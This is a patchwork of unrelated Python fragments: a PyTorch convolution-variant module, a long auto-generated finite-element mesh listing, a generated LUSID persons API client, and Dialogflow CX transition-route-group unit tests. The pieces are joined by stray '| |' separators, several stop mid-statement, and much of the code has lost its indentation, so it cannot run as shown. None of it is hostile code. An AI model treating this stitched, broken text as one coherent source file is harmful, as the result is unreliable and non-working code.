            in_planes, out_planes, out_planes // 16,
            kernel_size=kernel_size, stride=stride, padding=padding,
            bias=bias)
class DConv3D(nn.Module):
    """Depthwise conv followed by a (3,1,1) 3D conv across the channel axis.

    The depthwise kxk conv filters each input channel spatially; the channel
    dimension is then treated as the depth of a single-channel 3D volume,
    mixed by a Conv3d with a 3-wide kernel along depth, and the depth axis
    is mean-reduced back out, yielding (N, out_planes, H', W').
    """

    def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
        super().__init__()
        self.convdw = nn.Conv2d(in_planes, in_planes, kernel_size=kernel_size,
                                stride=stride, padding=padding, bias=bias,
                                groups=in_planes)
        self.bn = nn.BatchNorm2d(in_planes)
        self.conv3d = nn.Conv3d(1, out_planes, kernel_size=(3, 1, 1),
                                stride=1, padding=(1, 0, 0), bias=bias)

    def forward(self, x):
        depthwise = F.relu(self.bn(self.convdw(x)))
        # (N, C, H, W) -> (N, 1, C, H, W): channels become the 3D depth axis.
        volume = depthwise.unsqueeze(1)
        # Conv3d yields (N, out_planes, C, H, W); average out the depth axis.
        return self.conv3d(volume).mean(2)
def conv_function(convtype):
    """Map a convolution-type name to the corresponding class.

    Parameters
    ----------
    convtype : str
        One of the recognised convolution identifiers, e.g. 'Conv',
        'DConvG4', 'DConvB8', 'A2B2', 'ACDC'.

    Returns
    -------
    type
        The convolution class to instantiate.

    Raises
    ------
    ValueError
        If ``convtype`` is not a recognised name.
    """
    # Table-driven dispatch replaces the original 33-branch if/elif ladder.
    # The dict is built when this function is called, by which point every
    # class referenced below has been defined at module level.
    conv_types = {
        'Conv': Conv,
        'DConv': DConv,
        'DConvG2': DConvG2,
        'DConvG4': DConvG4,
        'DConvG8': DConvG8,
        'DConvG16': DConvG16,
        'DConvA2': DConvA2,
        'DConvA4': DConvA4,
        'DConvA8': DConvA8,
        'DConvA16': DConvA16,
        'Conv2x2': Conv2x2,
        'ConvB2': ConvB2,
        'ConvB4': ConvB4,
        'ConvB8': ConvB8,
        'ConvB16': ConvB16,
        'DConvB2': DConvB2,
        'DConvB4': DConvB4,
        'DConvB8': DConvB8,
        'DConvB16': DConvB16,
        'DConv3D': DConv3D,
        'G2B2': G2B2,
        'G4B2': G4B2,
        'G8B2': G8B2,
        'G16B2': G16B2,
        'G2B4': G2B4,
        'G4B4': G4B4,
        'G8B4': G8B4,
        'G16B4': G16B4,
        'A2B2': A2B2,
        'A4B2': A4B2,
        'A8B2': A8B2,
        'A16B2': A16B2,
        'ACDC': ACDC,
    }
    try:
        # `from None` keeps the user-visible traceback identical to the
        # original bare `raise ValueError` (no chained KeyError context).
        return conv_types[convtype]
    except KeyError:
        raise ValueError('Conv "%s" not recognised' % convtype) from None
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, dropRate=0.0, conv=Conv):
super(BasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.relu1 = nn.ReLU(inplace=True)
self.conv1 = conv(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
self.relu2 = nn.ReLU(inplace=True)
self.conv2 = conv(out_planes, out_planes, kernel_size=3, stride=1,
padding=1, bias=False)
self.droprate = dropRate
self.equalInOut = | |
5526, 5527, 5533, 5532)
# Auto-generated mesh definition: each call registers one 8-node
# quadrilateral element as createElement(eid, 4 corner node ids, 4 mid-side
# node ids). Element ids 3920-4078 tile a structured patch row by row
# (seven elements per row); within each row the node ids advance by fixed
# strides, so the numbering is regular rather than hand-written.
# NOTE(review): `model` and the exact createElement signature are defined
# elsewhere - node ordering assumed to be corners then mid-sides
# (CQUAD8-style); confirm against the mesh API before editing.
model.createElement(3920, 2687, 2688, 2694, 2693, 5527, 5528, 5534, 5533)
model.createElement(3921, 2688, 2689, 2695, 2694, 5528, 5529, 5535, 5534)
model.createElement(3922, 2689, 2690, 2696, 2695, 5529, 5530, 5536, 5535)
model.createElement(3923, 2690, 618, 617, 2696, 5530, 3065, 3066, 5536)
model.createElement(3924, 486, 2691, 2697, 487, 2415, 5531, 5537, 2414)
model.createElement(3925, 2691, 2692, 2698, 2697, 5531, 5532, 5538, 5537)
model.createElement(3926, 2692, 2693, 2699, 2698, 5532, 5533, 5539, 5538)
model.createElement(3927, 2693, 2694, 2700, 2699, 5533, 5534, 5540, 5539)
model.createElement(3928, 2694, 2695, 2701, 2700, 5534, 5535, 5541, 5540)
model.createElement(3929, 2695, 2696, 2702, 2701, 5535, 5536, 5542, 5541)
model.createElement(3930, 2696, 617, 616, 2702, 5536, 3066, 3067, 5542)
model.createElement(3931, 487, 2697, 2703, 488, 2414, 5537, 5543, 2413)
model.createElement(3932, 2697, 2698, 2704, 2703, 5537, 5538, 5544, 5543)
model.createElement(3933, 2698, 2699, 2705, 2704, 5538, 5539, 5545, 5544)
model.createElement(3934, 2699, 2700, 2706, 2705, 5539, 5540, 5546, 5545)
model.createElement(3935, 2700, 2701, 2707, 2706, 5540, 5541, 5547, 5546)
model.createElement(3936, 2701, 2702, 2708, 2707, 5541, 5542, 5548, 5547)
model.createElement(3937, 2702, 616, 615, 2708, 5542, 3067, 3068, 5548)
model.createElement(3938, 488, 2703, 2709, 489, 2413, 5543, 5549, 2412)
model.createElement(3939, 2703, 2704, 2710, 2709, 5543, 5544, 5550, 5549)
model.createElement(3940, 2704, 2705, 2711, 2710, 5544, 5545, 5551, 5550)
model.createElement(3941, 2705, 2706, 2712, 2711, 5545, 5546, 5552, 5551)
model.createElement(3942, 2706, 2707, 2713, 2712, 5546, 5547, 5553, 5552)
model.createElement(3943, 2707, 2708, 2714, 2713, 5547, 5548, 5554, 5553)
model.createElement(3944, 2708, 615, 614, 2714, 5548, 3068, 3069, 5554)
model.createElement(3945, 489, 2709, 2715, 490, 2412, 5549, 5555, 2411)
model.createElement(3946, 2709, 2710, 2716, 2715, 5549, 5550, 5556, 5555)
model.createElement(3947, 2710, 2711, 2717, 2716, 5550, 5551, 5557, 5556)
model.createElement(3948, 2711, 2712, 2718, 2717, 5551, 5552, 5558, 5557)
model.createElement(3949, 2712, 2713, 2719, 2718, 5552, 5553, 5559, 5558)
model.createElement(3950, 2713, 2714, 2720, 2719, 5553, 5554, 5560, 5559)
model.createElement(3951, 2714, 614, 613, 2720, 5554, 3069, 3070, 5560)
model.createElement(3952, 490, 2715, 2721, 491, 2411, 5555, 5561, 2410)
model.createElement(3953, 2715, 2716, 2722, 2721, 5555, 5556, 5562, 5561)
model.createElement(3954, 2716, 2717, 2723, 2722, 5556, 5557, 5563, 5562)
model.createElement(3955, 2717, 2718, 2724, 2723, 5557, 5558, 5564, 5563)
model.createElement(3956, 2718, 2719, 2725, 2724, 5558, 5559, 5565, 5564)
model.createElement(3957, 2719, 2720, 2726, 2725, 5559, 5560, 5566, 5565)
model.createElement(3958, 2720, 613, 612, 2726, 5560, 3070, 3071, 5566)
model.createElement(3959, 491, 2721, 2727, 492, 2410, 5561, 5567, 2409)
model.createElement(3960, 2721, 2722, 2728, 2727, 5561, 5562, 5568, 5567)
model.createElement(3961, 2722, 2723, 2729, 2728, 5562, 5563, 5569, 5568)
model.createElement(3962, 2723, 2724, 2730, 2729, 5563, 5564, 5570, 5569)
model.createElement(3963, 2724, 2725, 2731, 2730, 5564, 5565, 5571, 5570)
model.createElement(3964, 2725, 2726, 2732, 2731, 5565, 5566, 5572, 5571)
model.createElement(3965, 2726, 612, 611, 2732, 5566, 3071, 3072, 5572)
model.createElement(3966, 492, 2727, 2733, 493, 2409, 5567, 5573, 2408)
model.createElement(3967, 2727, 2728, 2734, 2733, 5567, 5568, 5574, 5573)
model.createElement(3968, 2728, 2729, 2735, 2734, 5568, 5569, 5575, 5574)
model.createElement(3969, 2729, 2730, 2736, 2735, 5569, 5570, 5576, 5575)
model.createElement(3970, 2730, 2731, 2737, 2736, 5570, 5571, 5577, 5576)
model.createElement(3971, 2731, 2732, 2738, 2737, 5571, 5572, 5578, 5577)
model.createElement(3972, 2732, 611, 610, 2738, 5572, 3072, 3073, 5578)
model.createElement(3973, 493, 2733, 2739, 494, 2408, 5573, 5579, 2407)
model.createElement(3974, 2733, 2734, 2740, 2739, 5573, 5574, 5580, 5579)
model.createElement(3975, 2734, 2735, 2741, 2740, 5574, 5575, 5581, 5580)
model.createElement(3976, 2735, 2736, 2742, 2741, 5575, 5576, 5582, 5581)
model.createElement(3977, 2736, 2737, 2743, 2742, 5576, 5577, 5583, 5582)
model.createElement(3978, 2737, 2738, 2744, 2743, 5577, 5578, 5584, 5583)
model.createElement(3979, 2738, 610, 609, 2744, 5578, 3073, 3074, 5584)
model.createElement(3980, 494, 2739, 2745, 495, 2407, 5579, 5585, 2406)
model.createElement(3981, 2739, 2740, 2746, 2745, 5579, 5580, 5586, 5585)
model.createElement(3982, 2740, 2741, 2747, 2746, 5580, 5581, 5587, 5586)
model.createElement(3983, 2741, 2742, 2748, 2747, 5581, 5582, 5588, 5587)
model.createElement(3984, 2742, 2743, 2749, 2748, 5582, 5583, 5589, 5588)
model.createElement(3985, 2743, 2744, 2750, 2749, 5583, 5584, 5590, 5589)
model.createElement(3986, 2744, 609, 608, 2750, 5584, 3074, 3075, 5590)
model.createElement(3987, 495, 2745, 2751, 496, 2406, 5585, 5591, 2405)
model.createElement(3988, 2745, 2746, 2752, 2751, 5585, 5586, 5592, 5591)
model.createElement(3989, 2746, 2747, 2753, 2752, 5586, 5587, 5593, 5592)
model.createElement(3990, 2747, 2748, 2754, 2753, 5587, 5588, 5594, 5593)
model.createElement(3991, 2748, 2749, 2755, 2754, 5588, 5589, 5595, 5594)
model.createElement(3992, 2749, 2750, 2756, 2755, 5589, 5590, 5596, 5595)
model.createElement(3993, 2750, 608, 607, 2756, 5590, 3075, 3076, 5596)
model.createElement(3994, 496, 2751, 2757, 497, 2405, 5591, 5597, 2404)
model.createElement(3995, 2751, 2752, 2758, 2757, 5591, 5592, 5598, 5597)
model.createElement(3996, 2752, 2753, 2759, 2758, 5592, 5593, 5599, 5598)
model.createElement(3997, 2753, 2754, 2760, 2759, 5593, 5594, 5600, 5599)
model.createElement(3998, 2754, 2755, 2761, 2760, 5594, 5595, 5601, 5600)
model.createElement(3999, 2755, 2756, 2762, 2761, 5595, 5596, 5602, 5601)
model.createElement(4000, 2756, 607, 606, 2762, 5596, 3076, 3077, 5602)
model.createElement(4001, 497, 2757, 2763, 498, 2404, 5597, 5603, 2403)
model.createElement(4002, 2757, 2758, 2764, 2763, 5597, 5598, 5604, 5603)
model.createElement(4003, 2758, 2759, 2765, 2764, 5598, 5599, 5605, 5604)
model.createElement(4004, 2759, 2760, 2766, 2765, 5599, 5600, 5606, 5605)
model.createElement(4005, 2760, 2761, 2767, 2766, 5600, 5601, 5607, 5606)
model.createElement(4006, 2761, 2762, 2768, 2767, 5601, 5602, 5608, 5607)
model.createElement(4007, 2762, 606, 605, 2768, 5602, 3077, 3078, 5608)
model.createElement(4008, 498, 2763, 2769, 499, 2403, 5603, 5609, 2402)
model.createElement(4009, 2763, 2764, 2770, 2769, 5603, 5604, 5610, 5609)
model.createElement(4010, 2764, 2765, 2771, 2770, 5604, 5605, 5611, 5610)
model.createElement(4011, 2765, 2766, 2772, 2771, 5605, 5606, 5612, 5611)
model.createElement(4012, 2766, 2767, 2773, 2772, 5606, 5607, 5613, 5612)
model.createElement(4013, 2767, 2768, 2774, 2773, 5607, 5608, 5614, 5613)
model.createElement(4014, 2768, 605, 604, 2774, 5608, 3078, 3079, 5614)
model.createElement(4015, 499, 2769, 2775, 500, 2402, 5609, 5615, 2401)
model.createElement(4016, 2769, 2770, 2776, 2775, 5609, 5610, 5616, 5615)
model.createElement(4017, 2770, 2771, 2777, 2776, 5610, 5611, 5617, 5616)
model.createElement(4018, 2771, 2772, 2778, 2777, 5611, 5612, 5618, 5617)
model.createElement(4019, 2772, 2773, 2779, 2778, 5612, 5613, 5619, 5618)
model.createElement(4020, 2773, 2774, 2780, 2779, 5613, 5614, 5620, 5619)
model.createElement(4021, 2774, 604, 603, 2780, 5614, 3079, 3080, 5620)
model.createElement(4022, 500, 2775, 2781, 501, 2401, 5615, 5621, 2400)
model.createElement(4023, 2775, 2776, 2782, 2781, 5615, 5616, 5622, 5621)
model.createElement(4024, 2776, 2777, 2783, 2782, 5616, 5617, 5623, 5622)
model.createElement(4025, 2777, 2778, 2784, 2783, 5617, 5618, 5624, 5623)
model.createElement(4026, 2778, 2779, 2785, 2784, 5618, 5619, 5625, 5624)
model.createElement(4027, 2779, 2780, 2786, 2785, 5619, 5620, 5626, 5625)
model.createElement(4028, 2780, 603, 602, 2786, 5620, 3080, 3081, 5626)
model.createElement(4029, 501, 2781, 2787, 502, 2400, 5621, 5627, 2399)
model.createElement(4030, 2781, 2782, 2788, 2787, 5621, 5622, 5628, 5627)
model.createElement(4031, 2782, 2783, 2789, 2788, 5622, 5623, 5629, 5628)
model.createElement(4032, 2783, 2784, 2790, 2789, 5623, 5624, 5630, 5629)
model.createElement(4033, 2784, 2785, 2791, 2790, 5624, 5625, 5631, 5630)
model.createElement(4034, 2785, 2786, 2792, 2791, 5625, 5626, 5632, 5631)
model.createElement(4035, 2786, 602, 601, 2792, 5626, 3081, 3082, 5632)
model.createElement(4036, 502, 2787, 2793, 503, 2399, 5627, 5633, 2398)
model.createElement(4037, 2787, 2788, 2794, 2793, 5627, 5628, 5634, 5633)
model.createElement(4038, 2788, 2789, 2795, 2794, 5628, 5629, 5635, 5634)
model.createElement(4039, 2789, 2790, 2796, 2795, 5629, 5630, 5636, 5635)
model.createElement(4040, 2790, 2791, 2797, 2796, 5630, 5631, 5637, 5636)
model.createElement(4041, 2791, 2792, 2798, 2797, 5631, 5632, 5638, 5637)
model.createElement(4042, 2792, 601, 600, 2798, 5632, 3082, 3083, 5638)
model.createElement(4043, 503, 2793, 2799, 504, 2398, 5633, 5639, 2397)
model.createElement(4044, 2793, 2794, 2800, 2799, 5633, 5634, 5640, 5639)
model.createElement(4045, 2794, 2795, 2801, 2800, 5634, 5635, 5641, 5640)
model.createElement(4046, 2795, 2796, 2802, 2801, 5635, 5636, 5642, 5641)
model.createElement(4047, 2796, 2797, 2803, 2802, 5636, 5637, 5643, 5642)
model.createElement(4048, 2797, 2798, 2804, 2803, 5637, 5638, 5644, 5643)
model.createElement(4049, 2798, 600, 599, 2804, 5638, 3083, 3084, 5644)
model.createElement(4050, 504, 2799, 2805, 505, 2397, 5639, 5645, 2396)
model.createElement(4051, 2799, 2800, 2806, 2805, 5639, 5640, 5646, 5645)
model.createElement(4052, 2800, 2801, 2807, 2806, 5640, 5641, 5647, 5646)
model.createElement(4053, 2801, 2802, 2808, 2807, 5641, 5642, 5648, 5647)
model.createElement(4054, 2802, 2803, 2809, 2808, 5642, 5643, 5649, 5648)
model.createElement(4055, 2803, 2804, 2810, 2809, 5643, 5644, 5650, 5649)
model.createElement(4056, 2804, 599, 598, 2810, 5644, 3084, 3085, 5650)
model.createElement(4057, 505, 2805, 2811, 506, 2396, 5645, 5651, 2395)
model.createElement(4058, 2805, 2806, 2812, 2811, 5645, 5646, 5652, 5651)
model.createElement(4059, 2806, 2807, 2813, 2812, 5646, 5647, 5653, 5652)
model.createElement(4060, 2807, 2808, 2814, 2813, 5647, 5648, 5654, 5653)
model.createElement(4061, 2808, 2809, 2815, 2814, 5648, 5649, 5655, 5654)
model.createElement(4062, 2809, 2810, 2816, 2815, 5649, 5650, 5656, 5655)
model.createElement(4063, 2810, 598, 597, 2816, 5650, 3085, 3086, 5656)
model.createElement(4064, 506, 2811, 2817, 507, 2395, 5651, 5657, 2394)
model.createElement(4065, 2811, 2812, 2818, 2817, 5651, 5652, 5658, 5657)
model.createElement(4066, 2812, 2813, 2819, 2818, 5652, 5653, 5659, 5658)
model.createElement(4067, 2813, 2814, 2820, 2819, 5653, 5654, 5660, 5659)
model.createElement(4068, 2814, 2815, 2821, 2820, 5654, 5655, 5661, 5660)
model.createElement(4069, 2815, 2816, 2822, 2821, 5655, 5656, 5662, 5661)
model.createElement(4070, 2816, 597, 596, 2822, 5656, 3086, 3087, 5662)
model.createElement(4071, 507, 2817, 2823, 508, 2394, 5657, 5663, 2393)
model.createElement(4072, 2817, 2818, 2824, 2823, 5657, 5658, 5664, 5663)
model.createElement(4073, 2818, 2819, 2825, 2824, 5658, 5659, 5665, 5664)
model.createElement(4074, 2819, 2820, 2826, 2825, 5659, 5660, 5666, 5665)
model.createElement(4075, 2820, 2821, 2827, 2826, 5660, 5661, 5667, 5666)
model.createElement(4076, 2821, 2822, 2828, 2827, 5661, 5662, 5668, 5667)
model.createElement(4077, 2822, 596, 595, 2828, 5662, 3087, 3088, 5668)
model.createElement(4078, 508, 2823, 2829, 509, 2393, 5663, 5669, 2392)
model.createElement(4079, 2823, 2824, 2830, 2829, | |
all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_person_relationships" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('id_type_scope' in local_var_params and # noqa: E501
len(local_var_params['id_type_scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_scope` when calling `get_person_relationships`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('id_type_scope' in local_var_params and # noqa: E501
len(local_var_params['id_type_scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_scope` when calling `get_person_relationships`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'id_type_scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['id_type_scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_scope` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('id_type_code' in local_var_params and # noqa: E501
len(local_var_params['id_type_code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_code` when calling `get_person_relationships`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('id_type_code' in local_var_params and # noqa: E501
len(local_var_params['id_type_code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_code` when calling `get_person_relationships`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'id_type_code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['id_type_code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_code` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_person_relationships`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_person_relationships`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('effective_at' in local_var_params and # noqa: E501
len(local_var_params['effective_at']) > 256): # noqa: E501
raise ApiValueError("Invalid value for parameter `effective_at` when calling `get_person_relationships`, length must be less than or equal to `256`") # noqa: E501
if self.api_client.client_side_validation and ('effective_at' in local_var_params and # noqa: E501
len(local_var_params['effective_at']) < 0): # noqa: E501
raise ApiValueError("Invalid value for parameter `effective_at` when calling `get_person_relationships`, length must be greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and 'effective_at' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_\+:\.]+$', local_var_params['effective_at']): # noqa: E501
raise ApiValueError("Invalid value for parameter `effective_at` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_\+:\.]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('filter' in local_var_params and # noqa: E501
len(local_var_params['filter']) > 2147483647): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `get_person_relationships`, length must be less than or equal to `2147483647`") # noqa: E501
if self.api_client.client_side_validation and ('filter' in local_var_params and # noqa: E501
len(local_var_params['filter']) < 0): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `get_person_relationships`, length must be greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and 'filter' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['filter']): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `get_person_relationships`, must conform to the pattern `/^[\s\S]*$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id_type_scope' in local_var_params:
path_params['idTypeScope'] = local_var_params['id_type_scope'] # noqa: E501
if 'id_type_code' in local_var_params:
path_params['idTypeCode'] = local_var_params['id_type_code'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
if 'identifier_types' in local_var_params and local_var_params['identifier_types'] is not None: # noqa: E501
query_params.append(('identifierTypes', local_var_params['identifier_types'])) # noqa: E501
collection_formats['identifierTypes'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfRelationship",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/persons/{idTypeScope}/{idTypeCode}/{code}/relationships', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_persons(self, id_type_scope, id_type_code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] ListPersons: List Persons.

    List persons which have identifiers of a specific identifier type's
    scope and code, and satisfy any filter criteria.

    Synchronous by default; pass ``async_req=True`` for an async call:

    >>> thread = api.list_persons(id_type_scope, id_type_code, async_req=True)
    >>> result = thread.get()

    :param id_type_scope: Scope of the person identifier type. (required)
    :type id_type_scope: str
    :param id_type_code: Code of the person identifier type. (required)
    :type id_type_code: str
    :param effective_at: The effective datetime or cut label at which to list the people. Defaults to the current LUSID system datetime if not specified.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the people. Defaults to the latest version of each person if not specified.
    :type as_at: datetime
    :param page: Pagination token returned by a previous call. If provided, the filter, effectiveAt and asAt fields must not have changed since the original request, and start must not be set.
    :type page: str
    :param start: When paginating, skip this number of results.
    :type start: int
    :param limit: When paginating, limit the number of returned results to this many. Defaults to 65,535 if not specified.
    :type limit: int
    :param filter: Expression to filter the result set, e.g. "lusidPersonId eq 'string'". See https://support.lusid.com/filtering-results-from-lusid.
    :type filter: str
    :param property_keys: Property keys from the "Person" domain to decorate onto each person, in {domain}/{scope}/{code} format, e.g. "Person/ContactDetails/Address".
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: If False, return the raw urllib3.HTTPResponse object without reading/decoding response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: Total request timeout in seconds, or a (connection, read) tuple.
    :return: PagedResourceListOfPerson, or the request thread when called asynchronously.
    :rtype: PagedResourceListOfPerson
    """
    # Delegate to the *_with_http_info variant, requesting the deserialized
    # body only (drop the status code / headers from the return value).
    kwargs['_return_http_data_only'] = True
    return self.list_persons_with_http_info(id_type_scope, id_type_code, **kwargs)  # noqa: E501
def list_persons_with_http_info(self, id_type_scope, id_type_code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] ListPersons: List Persons # noqa: E501
List persons which have identifiers of a specific identifier type's scope and code, and satisfies filter criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_persons_with_http_info(id_type_scope, id_type_code, async_req=True)
>>> result = thread.get()
:param id_type_scope: Scope of the person identifier type. (required)
:type id_type_scope: str
:param id_type_code: Code of the person identifier type. (required)
:type id_type_code: str
:param effective_at: The effective datetime or cut label at which to list the people. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the people. Defaults to return the latest version of each people if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios from a previous call to list portfolios. This value is returned from the previous call. If a pagination token is provided the | |
the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
client.delete_transition_route_group()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == transition_route_group.DeleteTransitionRouteGroupRequest()
@pytest.mark.asyncio
async def test_delete_transition_route_group_async(
    transport: str = "grpc_asyncio",
    request_type=transition_route_group.DeleteTransitionRouteGroupRequest,
):
    """Deleting a route group over async gRPC sends the request and returns None."""
    client = TransitionRouteGroupsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Every proto3 field is optional as far as the runtime is concerned and
    # the stub is mocked, so an empty request object is sufficient.
    request = request_type()

    with mock.patch.object(
        type(client.transport.delete_transition_route_group), "__call__"
    ) as call:
        # Fake the unary-unary RPC's awaitable result.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_transition_route_group(request)

    # The underlying stub was invoked with the expected request type.
    assert len(call.mock_calls)
    _, args, _ = call.mock_calls[0]
    assert args[0] == transition_route_group.DeleteTransitionRouteGroupRequest()

    # Delete RPCs surface google.protobuf.Empty as None.
    assert response is None
@pytest.mark.asyncio
async def test_delete_transition_route_group_async_from_dict():
    # Same as the async test above, but passes the request as a plain dict
    # to exercise the client's dict -> proto message coercion.
    await test_delete_transition_route_group_async(request_type=dict)
def test_delete_transition_route_group_field_headers():
    """The routed `name` field must be echoed in the request-params metadata."""
    client = TransitionRouteGroupsClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should also be sent as a
    # field header, so give the routed field a non-empty value.
    request = transition_route_group.DeleteTransitionRouteGroupRequest()
    request.name = "name/value"

    with mock.patch.object(
        type(client.transport.delete_transition_route_group), "__call__"
    ) as call:
        call.return_value = None
        client.delete_transition_route_group(request)

    # Exactly one RPC was made, carrying our request unchanged.
    assert len(call.mock_calls) == 1
    _, args, _ = call.mock_calls[0]
    assert args[0] == request

    # The x-goog-request-params header routes on the name field.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_transition_route_group_field_headers_async():
    """The async client must also echo the routed `name` field in metadata."""
    client = TransitionRouteGroupsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should also be sent as a
    # field header, so give the routed field a non-empty value.
    request = transition_route_group.DeleteTransitionRouteGroupRequest()
    request.name = "name/value"

    with mock.patch.object(
        type(client.transport.delete_transition_route_group), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_transition_route_group(request)

    # The stub saw our request unchanged...
    assert len(call.mock_calls)
    _, args, _ = call.mock_calls[0]
    assert args[0] == request

    # ...and the routing header was attached.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_transition_route_group_flattened():
    """Flattened keyword arguments are folded into the request message."""
    client = TransitionRouteGroupsClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    with mock.patch.object(
        type(client.transport.delete_transition_route_group), "__call__"
    ) as call:
        call.return_value = None
        # Invoke with a truthy value for each flattened field, passed as a
        # keyword argument rather than inside a request object.
        client.delete_transition_route_group(name="name_value",)

    # The flattened kwarg must land on the request message the stub received.
    assert len(call.mock_calls) == 1
    _, args, _ = call.mock_calls[0]
    assert args[0].name == "name_value"
def test_delete_transition_route_group_flattened_error():
    """Passing both a request object and flattened fields must raise."""
    client = TransitionRouteGroupsClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Supplying an explicit request message together with flattened kwargs
    # is ambiguous, so the client rejects the combination.
    with pytest.raises(ValueError):
        client.delete_transition_route_group(
            transition_route_group.DeleteTransitionRouteGroupRequest(),
            name="name_value",
        )
@pytest.mark.asyncio
async def test_delete_transition_route_group_flattened_async():
    """Flattened keyword arguments are folded into the request (async client)."""
    client = TransitionRouteGroupsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_transition_route_group), "__call__"
    ) as call:
        # Designate an appropriate return value for the call. (The original
        # assigned `call.return_value = None` first and immediately
        # overwrote it on the next line; that dead store is removed.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)

        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
